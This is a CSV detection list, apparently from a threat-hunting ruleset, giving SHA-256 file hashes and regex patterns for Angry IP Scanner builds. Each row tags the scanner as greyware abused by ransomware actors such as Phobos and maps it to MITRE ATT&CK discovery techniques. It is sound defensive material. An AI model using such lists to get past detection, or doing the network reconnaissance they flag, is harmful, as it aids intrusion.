"*16689e0739ff392f0240dea50b9f48b720bfac3a26a42adf52729321ee5d1f9c*",".{0,1000}16689e0739ff392f0240dea50b9f48b720bfac3a26a42adf52729321ee5d1f9c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*16cee34ed7af7175f622197c764fd0c69399bc6dc8b7d891ac76266d077c5415*",".{0,1000}16cee34ed7af7175f622197c764fd0c69399bc6dc8b7d891ac76266d077c5415.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*16da15648dd1bc0da44d0d6afd435c1a664cfaf9b7bc4ef7eecdd796727e40df*",".{0,1000}16da15648dd1bc0da44d0d6afd435c1a664cfaf9b7bc4ef7eecdd796727e40df.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*18d131bb7a04a65222cfb35ce549326e9debb5379d04e68d3d75e2d4ae24eb7d*",".{0,1000}18d131bb7a04a65222cfb35ce549326e9debb5379d04e68d3d75e2d4ae24eb7d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*19e5eb368d5b82d650a5ab168f4041dc2f2e526569349319c8d0adcde091a7d5*",".{0,1000}19e5eb368d5b82d650a5ab168f4041dc2f2e526569349319c8d0adcde091a7d5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1a1d59b366b35108f0681a69a77a8d67cae6d6111c589703526964e0243cf62f*",".{0,1000}1a1d59b366b35108f0681a69a77a8d67cae6d6111c589703526964e0243cf62f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1aa48436b6193acff1c9fe26e1456f35d5891aa90be2f203f5d59b77fa82df5a*",".{0,1000}1aa48436b6193acff1c9fe26e1456f35d5891aa90be2f203f5d59b77fa82df5a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1aea638f681b471f2bbe8714673b0c2fdd7f590b33cda162020e601f961dd4d0*",".{0,1000}1aea638f681b471f2bbe8714673b0c2fdd7f590b33cda162020e601f961dd4d0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1b89a1c5e9ef0bf0c91232fad88f31a6a27936407bff9e312a61ce5aab2bdac4*",".{0,1000}1b89a1c5e9ef0bf0c91232fad88f31a6a27936407bff9e312a61ce5aab2bdac4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1bff328616d4205bf3182c51e6267cee29b03e9cda22671cf0f2c153a4e39d0d*",".{0,1000}1bff328616d4205bf3182c51e6267cee29b03e9cda22671cf0f2c153a4e39d0d.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1c90f970cc49e643c0c108f63e6d3a7696b2f28da91a42fc0fb234562f48e3ce*",".{0,1000}1c90f970cc49e643c0c108f63e6d3a7696b2f28da91a42fc0fb234562f48e3ce.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1d83e3da93ce0ef31a742f8f3ed6b77fc29566f7e3b4f7b240f2adf7c40a2036*",".{0,1000}1d83e3da93ce0ef31a742f8f3ed6b77fc29566f7e3b4f7b240f2adf7c40a2036.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1e6f9b25d6e296f2f63dac75b8abd30cc6f0a85cd7bea0579d081fea67085082*",".{0,1000}1e6f9b25d6e296f2f63dac75b8abd30cc6f0a85cd7bea0579d081fea67085082.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1e8dc49b24079e1f1b78fe64f54e0c222be67d45bbd2a6e5f13e06ca10d75004*",".{0,1000}1e8dc49b24079e1f1b78fe64f54e0c222be67d45bbd2a6e5f13e06ca10d75004.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1e9b04a795d2cf5d7c71b576c13f35873413e1c8031019e951ba65e39655be58*",".{0,1000}1e9b04a795d2cf5d7c71b576c13f35873413e1c8031019e951ba65e39655be58.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1ec5de34fbde95ee1b1237a78d01bd39925007ca1d9e128fa470ec090c176de9*",".{0,1000}1ec5de34fbde95ee1b1237a78d01bd39925007ca1d9e128fa470ec090c176de9.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*1f14b24c5bf0a3ddc9af6394eab7245bd6af7f4c20322cd4177ef24e5e86bed0*",".{0,1000}1f14b24c5bf0a3ddc9af6394eab7245bd6af7f4c20322cd4177ef24e5e86bed0.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2043a9ceaa7f2eeb1bb77a9fb932bb484c848d167680ee34fccbf1684a7147ab*",".{0,1000}2043a9ceaa7f2eeb1bb77a9fb932bb484c848d167680ee34fccbf1684a7147ab.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*216ed12522652f3e745cb0e8313bc1fe245de0ab6b8cb5846d385858d59ba6b2*",".{0,1000}216ed12522652f3e745cb0e8313bc1fe245de0ab6b8cb5846d385858d59ba6b2.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2183b543d0a5fa662cb4413e8ad030499e3852b8466142a7040cd7fe0f4ef2b8*",".{0,1000}2183b543d0a5fa662cb4413e8ad030499e3852b8466142a7040cd7fe0f4ef2b8.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*21ea0b982bc934dbe8fd26234feee56d1093961de376f41dc82b59adf19c1505*",".{0,1000}21ea0b982bc934dbe8fd26234feee56d1093961de376f41dc82b59adf19c1505.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2236ee082c1c00e9423365db339a811a36869fcc4d3438e8c89982ccfe4917f4*",".{0,1000}2236ee082c1c00e9423365db339a811a36869fcc4d3438e8c89982ccfe4917f4.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*229e1c2dcb1fcccacd2816c7a0e1ad43733f7a09cf76df4ecd53ccdafee8bdda*",".{0,1000}229e1c2dcb1fcccacd2816c7a0e1ad43733f7a09cf76df4ecd53ccdafee8bdda.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*22c57d4a0ba5f22b33573aaa1d08f562375a9e33c7d4705fadadbb06450fff00*",".{0,1000}22c57d4a0ba5f22b33573aaa1d08f562375a9e33c7d4705fadadbb06450fff00.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2353b409ea98230f05e0d26815ad1517fd49b5996d009612fe691f9ace020400*",".{0,1000}2353b409ea98230f05e0d26815ad1517fd49b5996d009612fe691f9ace020400.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2376c3f4134f56449a4ef506be95da5ced01ec152ad558840c47e87ec160235c*",".{0,1000}2376c3f4134f56449a4ef506be95da5ced01ec152ad558840c47e87ec160235c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2496e4de6363347e5d36ee031c9d307d5f6e2533a20fb0d49d76cc4a2980e3b3*",".{0,1000}2496e4de6363347e5d36ee031c9d307d5f6e2533a20fb0d49d76cc4a2980e3b3.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*24a8be4d92df01761061085589d4b912140dc5140861a33bc7addc00042de754*",".{0,1000}24a8be4d92df01761061085589d4b912140dc5140861a33bc7addc00042de754.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*24bde49e5cce1189783eb0ba3c93b48c8f7d994328dacaa4fa2b9a7e2d04ce8c*",".{0,1000}24bde49e5cce1189783eb0ba3c93b48c8f7d994328dacaa4fa2b9a7e2d04ce8c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*257ba9e0bb8890194c9e8fc0c606ca928ee75ac9ac0adfc4d53b4489038a5bb5*",".{0,1000}257ba9e0bb8890194c9e8fc0c606ca928ee75ac9ac0adfc4d53b4489038a5bb5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*25e40f43e35ae0bcff2feea99ec311ab0f1dfa84bb311972dca123f1be073c2b*",".{0,1000}25e40f43e35ae0bcff2feea99ec311ab0f1dfa84bb311972dca123f1be073c2b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*26052ec687ec20c6de1e140266b194cc316b4ad5eef808e432a5f18988af2819*",".{0,1000}26052ec687ec20c6de1e140266b194cc316b4ad5eef808e432a5f18988af2819.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2b2705d375cb293e59fbd641bcc42936e458666acbc6a43d81a281091574d469*",".{0,1000}2b2705d375cb293e59fbd641bcc42936e458666acbc6a43d81a281091574d469.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2bd2ecd96c79e54de7c0e286107d0a8def7a3f52fc1fd114736fe51ce6a0bcca*",".{0,1000}2bd2ecd96c79e54de7c0e286107d0a8def7a3f52fc1fd114736fe51ce6a0bcca.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2d911f801c317eefce3ae952ef5a8c3625c0ba03c9dfb286534511958910b29e*",".{0,1000}2d911f801c317eefce3ae952ef5a8c3625c0ba03c9dfb286534511958910b29e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2e9ce2ed5ed7d036357e30c59478f345a7266f3531c2621785b91186ce241911*",".{0,1000}2e9ce2ed5ed7d036357e30c59478f345a7266f3531c2621785b91186ce241911.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*2eb477c2093771c42fd12d4c6c4bd7b94b9b6238909bdd5b3fb872408ce127a5*",".{0,1000}2eb477c2093771c42fd12d4c6c4bd7b94b9b6238909bdd5b3fb872408ce127a5.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*313f6252693b97c7b97fd97da6323ecf9ca3342819e954fb23f1b3988d9ec464*",".{0,1000}313f6252693b97c7b97fd97da6323ecf9ca3342819e954fb23f1b3988d9ec464.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3166a71c855545de502838af5fdec240655d4946cbf81e32181bee033a1cb86a*",".{0,1000}3166a71c855545de502838af5fdec240655d4946cbf81e32181bee033a1cb86a.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*31a9863499b273ade500620c3863eac9d905c677aecfe8e8c3d68fad63e1e343*",".{0,1000}31a9863499b273ade500620c3863eac9d905c677aecfe8e8c3d68fad63e1e343.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*32544295fb7ff44cb0052693474c713aa5b9fdd0574bed4a29f09fad6b1733eb*",".{0,1000}32544295fb7ff44cb0052693474c713aa5b9fdd0574bed4a29f09fad6b1733eb.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3283db621b621cbd7761709125c8097dc52ef0b9329bd25c9eb79a162b86eb12*",".{0,1000}3283db621b621cbd7761709125c8097dc52ef0b9329bd25c9eb79a162b86eb12.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*32ef83acc082cff716fd44e6f96f80c8bc39f1a3de74e59a2afcf71592374325*",".{0,1000}32ef83acc082cff716fd44e6f96f80c8bc39f1a3de74e59a2afcf71592374325.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3327d1a9abb9c15aea54434986986bf094fca303a3bd0cf82189d32a0dce44aa*",".{0,1000}3327d1a9abb9c15aea54434986986bf094fca303a3bd0cf82189d32a0dce44aa.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*34d8c2352fa1c264b7d9146069ebc780495b896bc767c10ba916e5a55cb9d1a6*",".{0,1000}34d8c2352fa1c264b7d9146069ebc780495b896bc767c10ba916e5a55cb9d1a6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*356d44637750712f238bd27f49fc6dba7f5ce22c92c83e94be7b9d3f59e54853*",".{0,1000}356d44637750712f238bd27f49fc6dba7f5ce22c92c83e94be7b9d3f59e54853.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*362e60a32dc864d5660bb7a9caae50b068bdd81924469bb014af395ebeef9a9e*",".{0,1000}362e60a32dc864d5660bb7a9caae50b068bdd81924469bb014af395ebeef9a9e.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3adee5344212720044b12dac4fa3e11231bb07a9cd65e2bd6031804278a3ef35*",".{0,1000}3adee5344212720044b12dac4fa3e11231bb07a9cd65e2bd6031804278a3ef35.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3b047ae119ef323d9fa486d1be07bcf85163fc392ab02ec37fd5437578d06d4b*",".{0,1000}3b047ae119ef323d9fa486d1be07bcf85163fc392ab02ec37fd5437578d06d4b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3b29215b47016a94daad3066fcfa2c11599d03ced78e4f40a71cb152aa9b1d5f*",".{0,1000}3b29215b47016a94daad3066fcfa2c11599d03ced78e4f40a71cb152aa9b1d5f.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3b9a9cc912b0817c09577835d094c74a61911213e0533f606f20a602ea3c1703*",".{0,1000}3b9a9cc912b0817c09577835d094c74a61911213e0533f606f20a602ea3c1703.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3bd117db83f5fae64618cfdf7def01d1f91cb00245af1bfbccbcd671978d62bd*",".{0,1000}3bd117db83f5fae64618cfdf7def01d1f91cb00245af1bfbccbcd671978d62bd.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3c577e92b14614dc484b1062561dbab2550708789fa1e70f7136c44195dd7275*",".{0,1000}3c577e92b14614dc484b1062561dbab2550708789fa1e70f7136c44195dd7275.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*3e7874880edf4af1c31a79d1291358791c9fbec5ee633839712af9edde7dbada*",".{0,1000}3e7874880edf4af1c31a79d1291358791c9fbec5ee633839712af9edde7dbada.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*400ed1628aabb30719dcca007c4d5a78e8cfcb794d35621c787a76e20fbb58c6*",".{0,1000}400ed1628aabb30719dcca007c4d5a78e8cfcb794d35621c787a76e20fbb58c6.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*407225db88e109bedc93d568ec7b0a241fc362156587b8b710bc2cbe270c257c*",".{0,1000}407225db88e109bedc93d568ec7b0a241fc362156587b8b710bc2cbe270c257c.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
"*40c2cf70de786de022195f0e3eb003c0f81c4dcb177fd1aad0c6cbb489eb900b*",".{0,1000}40c2cf70de786de022195f0e3eb003c0f81c4dcb177fd1aad0c6cbb489eb900b.{0,1000}","greyware_tool_keyword","ipscan","Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors","T1046 - T1040 - T1018","TA0007 - TA0009","N/A","Phobos","Discovery","https://github.com/angryip/ipscan","1","0","#filehash","N/A","7","10","4059","712","2024-06-11T19:43:19Z","2011-06-28T20:58:48Z"
